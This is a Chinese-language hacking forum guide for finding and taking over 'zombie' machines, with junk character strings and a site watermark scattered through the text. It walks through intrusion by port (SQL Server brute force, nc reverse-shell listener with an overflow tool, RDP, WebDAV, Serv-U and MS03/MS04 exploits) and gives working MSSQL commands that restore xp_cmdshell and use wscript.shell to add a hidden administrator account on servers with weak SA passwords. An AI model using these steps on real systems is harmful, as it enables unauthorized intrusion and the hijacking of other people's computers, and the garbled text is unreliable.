黑客抓鸡入侵工具大全

各端口入侵
J9[~T)jY1. 1433端口入侵芝麻黑客4wi"[
j/w*g3k)f)M;o
scanport.exe 查有1433的机器
}U4I\0gA_6R`SQLScanPass.exe 进行字典暴破（字典是关键）芝麻黑客"Ly's |@
最后 SQLTools.exe入侵芝麻黑客^jG.K&RX3o4rto
=============================芝麻黑客d,c:F^VF
对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。
lVfV6b _u#@ J)}nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
gh[q nc（以上反向的，测试成功）芝麻黑客j/b\4x*bN0qg
sqlhelloz.exe 入侵ip 1433 （这个是正向连接）芝麻黑客uZx0Ov}/P-zW
2. 4899端口入侵
;w_ E(MJ;e9h]~用4899过滤器.exe，扫描空口令的机器芝麻黑客|tWJ gBW
3. 3899的入侵芝麻黑客
X-k)OL2e!Dk!E7O.?
对很早的机器，可以试试3389的溢出(win3389ex.exe)芝麻黑客#LSr.`+U
|
对2000的机器，可以试试字典暴破。(tscrack.exe)芝麻黑客`4j e3s!U/k5L
4. 80入侵芝麻黑客UN3d+]vT1_
对sp3以前的机器，可以用webdav入侵；
uMf&`R;WPLU对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）芝麻黑客$b;M*w7v'W pSY
可以利用SQL进行注入。（小榕的注入软件）。
6LKFz0T#MJ0D5. serv-u入侵(21端口）
Jfv._fw对5. 004及以下系统，可用溢出入侵。（serv5004.exe）芝麻黑客|~Z"g
M;td.dK
对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）芝麻黑客I-T3?#D@D
======================================芝麻黑客;z/ZlS1XE:M9K_
对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）芝麻黑客8\'z-|V2S"Yi
输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A芝麻黑客#ECCb!H-[q
6. 554端口
&Vm7ild-i7zr7By用real554.exe入侵。
4^@@7iR)V/Z7. 6129端口
*N.yPr }用DameWare6129.exe入侵。芝麻黑客jO4H#i1\
8. 系统漏洞芝麻黑客BOP b2FX;a
利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，芝麻黑客(T8F#wW*?'z
To3?O,n$y
进行溢出入侵。芝麻黑客[w;hG)U8x
9. 3127等端口芝麻黑客!s(ZehUH4A ^
可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。
6|K'["be10. 其他入侵
2gW"Px"[njhbV0w利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。芝麻黑客tR\i/O-dF
SA弱口令找肉鸡芝麻黑客q`H I#n+};Vt8s2r
我自己现在找肉鸡主要是找SA弱口令肉鸡到还能找到几只。但也碰到不少困难。到处查资料总算找到点有用的
r0b*M9y4EB B下面这些命令要SQL分离器才能实现
,Nn)gfL7yj.I下面是一些关于sa弱口令相关命令.

F9ff*H.]F}注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。重要提示！以上提供的方法仅供学习研究！请大家不要进行任何破坏国内主机的违法行为！否则一切后果自负！转载请保留此信息。芝麻黑客)D0Mnf8c0?4N9z| ]\
一.更改sa口令方法：芝麻黑客.f utl5q
用sql综合利用工具连接后，执行命令：芝麻黑客Z"H2v0Od(mjC
exec sp_password NULL,'新密码','sa'
|N c4Bz0U(提示：慎用!)
7gu)q;e5x'r
X%B}$Ie+e MA9\1D二.简单修补sa弱口令.
\ K;F)oc![e;B方法1:查询分离器连接后执行：芝麻黑客0X"va.Cb
if exists (select * from芝麻黑客 _/w
z?Fd
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

I[#bP7KZY2XOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
XRV9n _
]0uyH?1R$Texec sp_dropextendedproc N'[dbo].[xp_cmdshell]'芝麻黑客XvV%|FF
GO芝麻黑客 G7x?#Yub/`
然后按F5键命令执行完毕
+fL"Q+K.f5Y9w方法2:查询分离器连接后
O.M~x]Hci9U!tV第一步执行：use master芝麻黑客#Y/l y7YF/ceT.I
第二步执行：sp_dropextendedproc 'xp_cmdshell'芝麻黑客5b#w5bpj
然后按F5键命令执行完毕
#u `]/TT;EH`1{wf芝麻黑客VVU|d:t
_4_
三.常见情况恢复执行xp_cmdshell.芝麻黑客F9z'SsQG/]
1 未能找到存储过程'master..xpcmdshell'.
_8VH.Q%QM+n/l4w恢复方法：查询分离器连接后,芝麻黑客4ms#c_
?-R:Fw
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
J*cuEml_ n"]FTi第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'芝麻黑客izNcv?T&y
然后按F5键命令执行完毕芝麻黑客n7JN;D])n
Z
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）芝麻黑客(@dSL0Y
恢复方法：查询分离器连接后,芝麻黑客Ve%I8v9A
第一步执行：sp_dropextendedproc "xp_cmdshell"
o8o usu第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0Cvc?N:I7sA然后按F5键命令执行完毕
$]2]P+|%`1hY2{r4F3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
1X IvN9yz恢复方法：查询分离器连接后,芝麻黑客3D R{ ^b
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
\l\ _u第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'芝麻黑客{I{*g%],H+B
然后按F5键命令执行完毕
aD{+Q
]qZs四.终极方法.芝麻黑客-[.w`K(w
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:芝麻黑客(G\aP"b}C:\
查询分离器连接后,芝麻黑客#z;z%quW7`-iE
2000servser系统:芝麻黑客1m4l+{[ x(y"Z~p
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'芝麻黑客 {&n9k{ D.^2wY
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'芝麻黑客 s/v y]sjOc
xp或2003server系统:芝麻黑客r7fWBQlC
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'芝麻黑客-Od8k|E y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'